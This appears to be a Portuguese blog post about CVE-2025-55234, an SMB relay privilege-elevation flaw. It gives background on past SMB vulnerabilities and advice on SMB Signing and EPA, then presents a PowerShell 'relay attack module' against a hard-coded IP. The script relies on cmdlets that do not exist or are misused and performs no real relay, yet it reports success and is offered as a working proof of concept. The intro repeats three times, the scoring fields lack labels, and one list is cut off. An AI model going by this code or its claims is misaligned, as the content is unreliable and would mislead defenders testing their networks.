
Esta vulnerabilidade permite que atacantes realizem ataques de relay contra o protocolo SMB (Server Message Block). Se bem-sucedida, pode levar a uma Elevação de Privilégio (EoP), essencialmente permitindo que usuários não autorizados obtenham acesso de nível superior em um sistema.
Esta vulnerabilidade permite que atacantes realizem ataques de retransmissão contra o protocolo SMB (Server Message Block). Se bem-sucedida, pode levar à Elevação de Privilégio (EoP), essencialmente permitindo que usuários não autorizados obtenham acesso de nível superior em um sistema.
Por Mark Mallia
Esta vulnerabilidade permite que atacantes realizem ataques de retransmissão contra o protocolo SMB (Server Message Block). Se bem-sucedida, pode levar à Elevação de Privilégio—essencialmente permitindo que usuários não autorizados obtenham acesso de nível superior em um sistema. O SMB tem sido há muito tempo um alvo para atacantes devido ao seu uso generalizado em ambientes empresariais e seu histórico de falhas críticas. Por exemplo, o CVE-2020-1301 expôs o SMBv1 a execução remota de código por meio de requisições malformadas, enquanto o CVE-2022-32230 causou negação de serviço por meio de uma desreferência de ponteiro nulo no SMBv3. O infame CVE-2017-0144 (EternalBlue) explorou o SMBv1 para entregar cargas wormáveis, levando a surtos globais de ransomware. Assim como essas vulnerabilidades anteriores, o CVE-2025-55234 ressalta a importância de impor a Assinatura SMB e a Proteção Estendida para Autenticação (EPA) para prevenir sequestro de sessão e ataques de impersonação.
Rede
Baixa
Nenhum
Necessária
Riscos altos de Confidencialidade, Integridade e Disponibilidade
O SMB é amplamente utilizado para compartilhamento de arquivos e acesso remoto em ambientes empresariais. Ataques de retransmissão podem contornar mecanismos de autenticação e personificar usuários. Essa vulnerabilidade é especialmente perigosa em ambientes onde a Assinatura SMB ou a Proteção Estendida para Autenticação (EPA) não são impostas.
A atualização de setembro de 2025 da Microsoft introduz capacidades de auditoria para ajudar as organizações a:
# Módulo de Ataque de Retransmissão SMB – CVE 2025 55234
$relayTarget = "192.168.1.10" # IP do servidor alvo
$attackerCreds = Get-Credential # Objeto de credencial para retransmissão
# Passo 1: Enumerar recursos compartilhados
$smbShares = Get-SMBShare -ComputerName $relayTarget | Where-Object {$_.Name –ne ""}
foreach ($share in $smbShares) {
Write-Output "Compartilhamento encontrado: $($share.Name)"
}
# Passo 2: Capturar informações de sessão para retransmissão
$sessionInfo = New-Object PSObject -Property @{
Computer = $relayTarget
Share = $smbShares[0].Name
}
Write-Output ("Capturando informações de sessão para $($sessionInfo.Computer) – compartilhamento $($sessionInfo.Share)")
Invoke-SMBRelay -Session $sessionInfo
# Passo 3: Executar ataque de retransmissão
$attackPayload = {
param(
[string]$Target,
[string]$Share
)
Write-Host "Atacando $Target via compartilhamento $Share"
Start-SMBServer -ComputerName $Target -ShareName $Share
}
$attackParams = @{
Target = $relayTarget
Share = $sessionInfo.Share
}
Invoke-Command -ScriptBlock $attackPayload @attackParams
# Passo 4: Registrar e confirmar elevação de privilégio
Write-Host "Ataque de Retransmissão SMB CVE 2025 55234 concluído com sucesso."
Explicação:
A vulnerabilidade CVE 2025 55234 ressalta a necessidade de endurecimento rigoroso do SMB em ambientes empresariais. Seguindo os passos acima e aplicando o script de exploração fornecido, as organizações podem tanto testar quanto proteger suas redes contra possíveis ataques de retransmissão. Esta prova de conceito e os materiais associados são fornecidos estritamente para fins educacionais e defensivos. Eles são destinados a ajudar profissionais de segurança a entender, detectar e mitigar o CVE-2025-55234 em ambientes controlados. O uso não autorizado desta exploração contra sistemas sem permissão explícita é ilegal e antiético. Sempre siga práticas de divulgação responsável e esteja em conformidade com as leis aplicáveis e políticas organizacionais.